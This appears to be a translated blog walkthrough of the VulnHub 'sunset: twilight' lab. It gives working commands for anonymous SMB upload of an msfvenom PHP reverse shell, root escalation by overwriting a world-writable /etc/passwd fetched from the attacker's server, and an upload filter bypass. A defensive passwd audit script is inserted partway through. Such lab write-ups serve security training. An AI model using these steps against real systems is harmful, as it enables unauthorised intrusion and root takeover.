PJzhang: vulnhub target machine, sunset series: SUNSET: TWILIGHT

Maoning~~~

 

Address: https://www.vulnhub.com/entry/sunset-twilight,512/

The focus is on the tools and the approach.

nmap 192.168.43.0/24
Target machine IP
192.168.43.164

nmap -A -p1-65535 192.168.43.164

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp open smtp Exim smtpd 4.92
80/tcp open http Apache httpd 2.4.38 ((Debian))
139/tcp open netbios-ssn netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open microsoft-ds netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
2121/tcp open ccproxy-ftp pyftpdlib 1.5.6
3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
8080/tcp open http-proxy PHP cli server 5.5 or later
63525/tcp open http PHP cli server 5.5 or later

enum4linux 192.168.43.164
WRKSHARE Disk Workplace Share. Do not access if not an employee.

smbclient //192.168.43.164/WRKSHARE, login without a password
smb: \>
cd \var\www\html
smb: \var\www\html\>

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw >muma.php

Upload muma.php over SMB
smb: \var\www\html\> put muma.php

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run

Visit http://192.168.43.164/muma.php to get the reverse shell

shell
python -c "import pty;pty.spawn('/bin/bash')"
www-data@twilight:/var/www/html$

cd /home
This shows that a user named miguel exists
cat /etc/passwd
miguel:x:1000:1000:,,,:/home/miguel:/bin/bash

ls -al /etc/passwd, it has read and write permission
-rwxrwxrwx 1 root root 1594 Jul 16 09:34 /etc/passwd

Run on the attacking machine
openssl passwd -1 -salt useruser 123456

Copy the target's /etc/passwd to the local machine
Append as the last line
useruser:$1$useruser$8MVi1CAiLopcN8yk6Hj4B0:0:0:/root/root:/bin/bash

python3 -m http.server 80

wget http://192.168.43.154/passwd -O /etc/passwd

su useruser
id
uid=0(root) gid=0(root) groups=0(root)
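
A defender-side check for the conditions this escalation depends on, added here as an example and not part of the original post: it flags a world-writable account file, any UID 0 entry other than root, a password hash stored inline, and lines without seven fields. The function names, finding labels and the sample file (with a placeholder hash) are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): audit a passwd-format file for
# the conditions the escalation above depends on. Finding labels are made up.

# audit_passwd FILE: print one finding per line.
audit_passwd() {
    file=$1
    # Octal permission bits: GNU stat first, BSD stat as a fallback.
    mode=$(stat -c '%a' "$file" 2>/dev/null || stat -f '%Lp' "$file")
    # The last octal digit is the "other" class; 2, 3, 6 and 7 include write.
    case "${mode#"${mode%?}"}" in
        2|3|6|7) echo "WORLD_WRITABLE mode=$mode" ;;
    esac
    awk -F: '
        /^$/ { next }
        # passwd(5) defines exactly seven colon-separated fields.
        NF != 7 { print "MALFORMED line=" NR " fields=" NF }
        # Any UID 0 entry other than root is a second superuser.
        $3 == 0 && $1 != "root" { print "EXTRA_UID0 user=" $1 }
        # With shadow passwords the second field is a marker, not a hash.
        $2 != "" && $2 != "x" && $2 != "*" && $2 != "!" { print "INLINE_HASH user=" $1 }
        $2 == "" { print "EMPTY_PASSWORD user=" $1 }
    ' "$file"
}

# make_sample: write a constructed file shaped like the one in the walkthrough
# (mode 777, one appended UID 0 line with a placeholder hash); print its path.
make_sample() {
    sample=$(mktemp)
    cat > "$sample" <<'EOF'
root:x:0:0:root:/root:/bin/bash
miguel:x:1000:1000:,,,:/home/miguel:/bin/bash
useruser:$1$useruser$PLACEHOLDERHASH0000000:0:0:/root/root:/bin/bash
EOF
    chmod 777 "$sample"
    echo "$sample"
}

# Demo on the constructed sample; on a real host run: audit_passwd /etc/passwd
demo=$(make_sample)
audit_passwd "$demo"
rm -f "$demo"
```

On a correctly configured host /etc/passwd is mode 644 and owned by root, and the check prints nothing.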

 

Getting a shell through the upload interface

dirb http://192.168.43.3/

http://192.168.43.3/gallery/

http://192.168.43.3/gallery/original/ lets you browse the file directory, for example the uploaded muma.php

Rename muma.php to muma.php.pjpeg

Upload it and intercept the request with burpsuite,
Content-Type: image/jpeg
Change the file name back to muma.php

The upload succeeds

http://192.168.43.3/gallery/original/muma.php

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.154 LPORT=4444 -f raw >muma.php
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.43.154
set lport 4444
run

Shell obtained successfully

 
